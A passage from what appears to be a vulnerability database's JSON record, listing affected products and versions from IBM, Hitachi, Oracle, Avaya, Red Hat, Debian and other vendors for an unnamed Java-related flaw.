{ "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus operator (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "jdk 1.5.0 11", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer standard 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "jrockit r28.0.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "runtimes for java technology 7r1 sr1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.16" }, { "model": "jdk 1.5.0.0 06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.4" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.03" }, { "model": "cosminexus developer professional 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.09" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "db2 accessories suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "jrockit r28.1.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ts7740 virtualization engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3957-v06" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.08" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.04" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.15" }, { "model": "cosminexus client 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "enterprise linux server supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "ucosminexus primary server base (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-71-/m", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.071" }, { "model": "jdk 1.5.0 11-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "web sphere real time service refresh", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "36" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "cosminexus developer light 06-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0108-20" }, { "model": "enterprise linux workstation supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "cosminexus application server enterprise 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise desktop sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "network and security manager software r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "cosminexus developer 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.6" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.01" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.6.0" }, { "model": "sterling secure proxy ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.6" }, { "model": "cosminexus application server enterprise 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus client 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "linux enterprise server sp4 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "ims explorer for development", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.0" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "ucosminexus application server light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.115" }, { "model": "ucosminexus developer standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus primary server base 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.1" }, { "model": "ucosminexus client 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 08", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "cosminexus application server standard 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.4" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus application server enterprise 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.37" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli provisioning manager for software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "network and security manager software r6", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "jrockit r27.8.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cms r17ac.g", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "cosminexus client 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "cosminexus developer light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.1" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.24" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.01" }, { "model": "ucosminexus client (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "ucosminexus application server enterprise 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cms r17ac.h", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "cosminexus studio 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "network and security manager software r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.802" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.18" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus studio 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.4" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "jrockit r27.6.0-50", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.015" }, { "model": "sterling secure proxy patch ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.123" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.404" }, { "model": "cosminexus application server 05-02-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk 01", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.43" }, { "model": "cosminexus studio 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.2" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.31" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "jrockit r27.6.5", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "ucosminexus service platform )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "network and security manager software", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2-" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "linux enterprise server sp2 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "ucosminexus developer standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "ucosminexus client for plug-in (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.10" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cosminexus developer standard 06-50-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.2" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.1" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "cosminexus developer professional 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.11" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.07" }, { "model": "linux enterprise server sp3 for vmware", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "ucosminexus application server standard 06-70-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-71" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.4.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.6" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "cosminexus client 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus primary server base 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "linux enterprise server sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "fabric manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.00.22" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "runtimes for java technology", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "soap gateway component of the ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus client 06-70-/q", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-51" }, { "model": "runtimes for java technology sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-01" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "cosminexus developer professional 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "ucosminexus application server standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.0" }, { "model": "jrockit r28.0.1", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "cosminexus primary server base 06-02-/g", "scope": null, "trust": 